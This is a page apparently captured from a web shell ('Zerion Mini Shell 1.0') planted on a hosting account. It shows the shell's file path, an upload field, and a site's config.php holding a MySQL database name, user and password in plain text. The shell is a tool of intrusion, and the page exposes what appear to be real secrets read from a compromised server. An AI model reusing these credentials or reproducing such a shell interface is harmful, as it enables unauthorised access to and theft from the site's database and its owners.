ok

Mini Shell

Direktori : /home2/selectio/public_html/ramali.in/dashboard/includes/
Upload File :
Current File : //home2/selectio/public_html/ramali.in/dashboard/includes/config.php

<?php
ini_set('error_reporting', E_ALL);

date_default_timezone_set('Asia/Kolkata');

$dbhost = 'localhost';
$dbname = 'selectio_ramalitextlive';
$dbuser = 'selectio_ramali_text_live';
$dbpass = 'ramali_text_live';

try {
	$pdo = new PDO("mysql:host={$dbhost};dbname={$dbname}", $dbuser, $dbpass);
	$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
}
catch( PDOException $exception ) {
	echo "Connection error :" . $exception->getMessage();
	header("location: db-connection-error.php");
}

Zerion Mini Shell 1.0